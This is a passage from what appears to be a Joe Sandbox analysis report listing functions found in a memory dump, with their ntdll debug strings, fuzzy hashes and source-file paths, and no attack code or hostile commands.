                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                  • API String ID: 0-1676968949
                                                                  • Opcode ID: ebe368bd333fe4f0be3a76ca768cfe8eca8ce6d3bab2b5cfaf4a3252921d96cd
                                                                  • Instruction ID: 4b69c90098b9e1d6ea4ae2deedb12c624623c5fe89de5a38e49da38f7fd6007d
                                                                  • Opcode Fuzzy Hash: ebe368bd333fe4f0be3a76ca768cfe8eca8ce6d3bab2b5cfaf4a3252921d96cd
                                                                  • Instruction Fuzzy Hash: 82510378B04745EBE711CF6CC984B6A77E5AB04764F1106A4E9939F6D1DB38E900CB42
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3785D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • HEAP[%wZ]: , xrefs: 3785D792
                                                                  • HEAP: , xrefs: 3785D79F
                                                                  • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3785D7B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                  • API String ID: 0-3815128232
                                                                  • Opcode ID: 3481cd0cfeae592135df6653a4b2316e381f9c22d820a32165e194bc6dec71a0
                                                                  • Instruction ID: 08d0dd8aa027cde5dc933436d5e94c0b274940e4dd44533b35ac9f255e483f79
                                                                  • Opcode Fuzzy Hash: 3481cd0cfeae592135df6653a4b2316e381f9c22d820a32165e194bc6dec71a0
                                                                  • Instruction Fuzzy Hash: A6511379100754CEF350CE29C8C477277E1DB652B9F908989ECC5AB285EA29E843DB71
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377A753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                  • API String ID: 0-1151232445
                                                                  • Opcode ID: 10e47579783c3e4b16c642b1fe8b55e0ca5db7d934254b5337c5164c247aba0b
                                                                  • Instruction ID: 765eefae4831781fc687e4fa4d1ff3805fbce925e0b9e991d95810e0ed977237
                                                                  • Opcode Fuzzy Hash: 10e47579783c3e4b16c642b1fe8b55e0ca5db7d934254b5337c5164c247aba0b
                                                                  • Instruction Fuzzy Hash: FC412178600340AFFB94CF18C8D8BF577A19F11269F6445ADDC858F752CA24E44ACFA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E15EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • LdrpAllocateTls, xrefs: 3782194A
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 37821954
                                                                  • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 37821943
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                  • API String ID: 0-4274184382
                                                                  • Opcode ID: 7635424516fd1ceddf6def65dde0a0741dd8d528a8de628d3a619ffac8073bd7
                                                                  • Instruction ID: 10ff33f2ca54a27f50c8e012ae6a16e2ab0e8de1d1200fd1da24075842208bc8
                                                                  • Opcode Fuzzy Hash: 7635424516fd1ceddf6def65dde0a0741dd8d528a8de628d3a619ffac8073bd7
                                                                  • Instruction Fuzzy Hash: 4B4179B5E01205AFDB15CFA8D885BAEFBB5FF48314F108529E805AB611DB39A840CF91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377BA1E3 Relevance: 3.9, Strings: 3, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 377BA21B
                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 377BA229
                                                                  • @Sx7, xrefs: 377BA268
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @Sx7$RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                  • API String ID: 0-4148481484
                                                                  • Opcode ID: debb2c0b7442f174f392c78026e6de5789cfd2f4971b02ff8e5cf6d5dbc5481e
                                                                  • Instruction ID: 03dd0f38d195c676cdfe2f81f5e035f1b4cc147affe66907e4f8b468009da98e
                                                                  • Opcode Fuzzy Hash: debb2c0b7442f174f392c78026e6de5789cfd2f4971b02ff8e5cf6d5dbc5481e
                                                                  • Instruction Fuzzy Hash: AE41DC74B00705DBEB21DF99C880FA97BB5EF95760F1144A5E804EF2A1E73AE900CB11
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3783B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • @, xrefs: 3783B2F0
                                                                  • GlobalFlag, xrefs: 3783B30F
                                                                  • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 3783B2B2
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                                                  • API String ID: 0-4192008846
                                                                  • Opcode ID: 332656c718a5a75165121969b28ff806ae8eaa996baad638aea0f850e052d4b3
                                                                  • Instruction ID: a24cb864bfe959d520bfde5c323f0c4666d0dc2e83165a4e3723f61a5059d07a
                                                                  • Opcode Fuzzy Hash: 332656c718a5a75165121969b28ff806ae8eaa996baad638aea0f850e052d4b3
                                                                  • Instruction Fuzzy Hash: 29314FB5D01219AEEB10EF98DC85BEEBBBCEF54754F400469E601AB240D779AA04CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E1527 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • DLL "%wZ" has TLS information at %p, xrefs: 3782184A
                                                                  • minkernel\ntdll\ldrtls.c, xrefs: 3782185B
                                                                  • LdrpInitializeTls, xrefs: 37821851
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                                                  • API String ID: 0-931879808
                                                                  • Opcode ID: ddb0f4c4ae25679f228861c023602b49de88120999199a2c4d78ea6dcbad9ebb
                                                                  • Instruction ID: 7443d14759102614dc2a4d6a14e24a51effd2e92e3c45abfe39a6a483fcdb667
                                                                  • Opcode Fuzzy Hash: ddb0f4c4ae25679f228861c023602b49de88120999199a2c4d78ea6dcbad9ebb
                                                                  • Instruction Fuzzy Hash: 8A31E771B41300FBE7108B58C88BF6AB7BDAB54364F110439E501BF980DB74AD8587A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 378385AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 378385DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                  • API String ID: 0-702105204
                                                                  • Opcode ID: 762d2e2f6be98ad10bbfe9d24bc1102f01eefaca8bf3589f88301a8d9be94286
                                                                  • Instruction ID: 5c3b3aaa6f3d520933c6be267de675ad091fb63d2b2faea9182540ecab989f01
                                                                  • Opcode Fuzzy Hash: 762d2e2f6be98ad10bbfe9d24bc1102f01eefaca8bf3589f88301a8d9be94286
                                                                  • Instruction Fuzzy Hash: 0E01427D2032049FF7604E5CD88CBAA3B75EF612A0F400C68E0015A152DB28B882EAF6
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B5622 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 1d0eb0a16bf463915aeab57ae6f6ad855b9dd98b15fc72b170495c6d198f782a
                                                                  • Instruction ID: 4006351fe9e46cc754e2a1cca7d912489ad9f6e5af23e3d26fea457225ad0eca
                                                                  • Opcode Fuzzy Hash: 1d0eb0a16bf463915aeab57ae6f6ad855b9dd98b15fc72b170495c6d198f782a
                                                                  • Instruction Fuzzy Hash: DB319035201B06AFEB659F65C984B9AFB66BF58BA8F004115E9048BA50DB74E821CBC1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3782E372 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Legacy$UEFI
                                                                  • API String ID: 2994545307-634100481
                                                                  • Opcode ID: 6ccecbc76438b1564f3a3ed119af59d58a27ca303ea5f7daa5e4c7fb7da9750f
                                                                  • Instruction ID: f8e4fa8b90983b4a64ebd313e38b7c1065bf749be864fbd5abfb1f1b791270ec
                                                                  • Opcode Fuzzy Hash: 6ccecbc76438b1564f3a3ed119af59d58a27ca303ea5f7daa5e4c7fb7da9750f
                                                                  • Instruction Fuzzy Hash: A6616AB1A107089FEB14CFA8C944BADB7B8FF58751F54402EE549EB241EB31E980DB54
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 3788B55F Relevance: 2.7, Strings: 2, Instructions: 168COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • RedirectedKey, xrefs: 3788B60E
                                                                  • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 3788B5C4
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                  • API String ID: 0-1388552009
                                                                  • Opcode ID: 59bb6c5b3f3c215fd4ed5035d89be567fa28b8d4bc022c4b115812d43c47cc9e
                                                                  • Instruction ID: 5b2c1130d4fad2ad789f560f3348baf8efbf37a1ee14f553850a6cbdcc07ed4d
                                                                  • Opcode Fuzzy Hash: 59bb6c5b3f3c215fd4ed5035d89be567fa28b8d4bc022c4b115812d43c47cc9e
                                                                  • Instruction Fuzzy Hash: 7361E3B5D01219EBDF11DFD8C889ADEBFB8FB58710F50406AE415A7200D7349A45CFA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377CF640 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID: $$$
                                                                  • API String ID: 3446177414-233714265
                                                                  • Opcode ID: 16aa9c863ed71859f045312601ca4240d36425f3875d9d022fc9febe887fea33
                                                                  • Instruction ID: cf4b4a226df5aafba0208b7fb5ffc1d22269bcac23fdd7b0fc33702b79183203
                                                                  • Opcode Fuzzy Hash: 16aa9c863ed71859f045312601ca4240d36425f3875d9d022fc9febe887fea33
                                                                  • Instruction Fuzzy Hash: 8861F176A0174ACFEB20CFA4C684BADB7F2FF08714F504469E1056F644CB78A982CB81
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B06CF Relevance: 2.6, Strings: 2, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: z7$ z7
                                                                  • API String ID: 0-2832549702
                                                                  • Opcode ID: cacd762708bd6a605bcb6c229ee5d23b2bd2d13463ee229196d18e4f5d2f2964
                                                                  • Instruction ID: 2dcfa9c323e1553918b436720eecaed4d4243ed12ce143b62691d91050b71f41
                                                                  • Opcode Fuzzy Hash: cacd762708bd6a605bcb6c229ee5d23b2bd2d13463ee229196d18e4f5d2f2964
                                                                  • Instruction Fuzzy Hash: 3C31B636608709ABDF21DE248894E7BB7A6EF946A0F014529FC159F310EB34DC15CFA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377E33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 3782289F
                                                                  • RtlpInitializeAssemblyStorageMap, xrefs: 3782289A
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                  • API String ID: 0-2653619699
                                                                  • Opcode ID: bffdbd336480e8767aab540f73c3506da6f20b7703c6bb43ba9ad2ce208bd636
                                                                  • Instruction ID: dd22856891b8f559e8db86bd45b081720661648d66e8c059f88833fa7b38c9bf
                                                                  • Opcode Fuzzy Hash: bffdbd336480e8767aab540f73c3506da6f20b7703c6bb43ba9ad2ce208bd636
                                                                  • Instruction Fuzzy Hash: F0113272B00308AFE7158E488C40FAA36ACDB89760F618029B900EF244DA74DD0097A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377EA4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID: Cleanup Group$Threadpool!
                                                                  • API String ID: 2994545307-4008356553
                                                                  • Opcode ID: 0d34474cf8d79cbd74d2968ef2fa152e57366ae277e3d617138963bf98f8944b
                                                                  • Instruction ID: 0d97bd82de8dbc691cbc84d5418e95de77f45e20bc2df57a30367b582798d438
                                                                  • Opcode Fuzzy Hash: 0d34474cf8d79cbd74d2968ef2fa152e57366ae277e3d617138963bf98f8944b
                                                                  • Instruction Fuzzy Hash: 6801D1B2250700AFE311CF24CE4AB2677F8EB80715F01897AE558CB990E738E904CB46
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377BC6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: MUI
                                                                  • API String ID: 0-1339004836
                                                                  • Opcode ID: 7a7c3d5449f17dc01c14b5bb7c1406163d02e562707fd523fb05375ead719f1c
                                                                  • Instruction ID: c7567aa21907b9a3adf02be88323dccd3389da1f256091bdae31c7e0d23c7d91
                                                                  • Opcode Fuzzy Hash: 7a7c3d5449f17dc01c14b5bb7c1406163d02e562707fd523fb05375ead719f1c
                                                                  • Instruction Fuzzy Hash: 34823A79E003189FEF24CFA9C8807EDB7B6BF48360F508569E859AF251DB34A945CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B64F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9292efda504e00707e110859d8585f0cc8c3cd28a3fd6e405ff39348d3c150ff
                                                                  • Instruction ID: a2cfc533795e1275de8675f724823ba49c0f01f18e289ddd149d5ec8f5d3c222
                                                                  • Opcode Fuzzy Hash: 9292efda504e00707e110859d8585f0cc8c3cd28a3fd6e405ff39348d3c150ff
                                                                  • Instruction Fuzzy Hash: 11E16B75608341CFDB24CF28C490B5ABBE1BF88358F05896DE695CB351DB31E906CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377DE507 Relevance: 1.8, APIs: 1, Instructions: 278COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef0003fc1708157b2151eaff6bf1e0df44df146d223c08cd6fbb1fa69813f273
                                                                  • Instruction ID: 659d24e665e105bd2b5a34bf2e69f61d3dffdbe40055b1854bcfe110fc68e81c
                                                                  • Opcode Fuzzy Hash: ef0003fc1708157b2151eaff6bf1e0df44df146d223c08cd6fbb1fa69813f273
                                                                  • Instruction Fuzzy Hash: 10A10675E12314EFEB12CFA4C848BAE7BB5AB04768F050125E911BF291D7B8AD40CBD1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B754C Relevance: 1.8, APIs: 1, Instructions: 277COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 32f8fcee5008393dd4bbc413e26adefeab7e5a212dca397d953f5a41085deb74
                                                                  • Instruction ID: 9e59ba6755d1e1946c14d0b6a530f1a55ce7f3d0237b21601d092d1b136a3d97
                                                                  • Opcode Fuzzy Hash: 32f8fcee5008393dd4bbc413e26adefeab7e5a212dca397d953f5a41085deb74
                                                                  • Instruction Fuzzy Hash: F1B13A75A01206DFDB18CF68C480AA9FBB6BF88354F2585AED4199F351DB34A941CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B254C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 347d03aa82219ba265dfbbc1445c8cb457fbaefb5b50ef66fb4a7872f9202680
                                                                  • Instruction ID: 4524abf645091681cd82db16dc4facac756f72fc047b25526a0a6f034406dd5e
                                                                  • Opcode Fuzzy Hash: 347d03aa82219ba265dfbbc1445c8cb457fbaefb5b50ef66fb4a7872f9202680
                                                                  • Instruction Fuzzy Hash: CA41F3B5602704DFDB21DF24C944B59B7F2FF58368F108A9AC0169F6A0DB34A941CF82
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377B4779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
                                                                  • Opcode ID: 6390547cc1572c6a8801dc70d8f778e3d2806f24aaaa3c9d3e48e49b5f6e0095
                                                                  • Instruction ID: f2ffea2833b3bde0051f227cce9e233460a845732073810dd01fcdd7854c2e37
                                                                  • Opcode Fuzzy Hash: 6390547cc1572c6a8801dc70d8f778e3d2806f24aaaa3c9d3e48e49b5f6e0095
                                                                  • Instruction Fuzzy Hash: EB41C2756043419FDB25CF28D894B2ABBEAFF853A0F10483DE5458F2A1DB34E845CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 377AB420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.28913776273.0000000037780000.00000040.00001000.00020000.00000000.sdmp, Offset: 37780000, based on PE: true
                                                                  • Associated: 00000002.00000002.28913776273.00000000378A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000002.00000002.28913776273.00000000378AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_37780000_rResegregation.jbxd
                                                                  Similarity
                                                                  • API ID: DebugPrintTimes
                                                                  • String ID:
                                                                  • API String ID: 3446177414-0
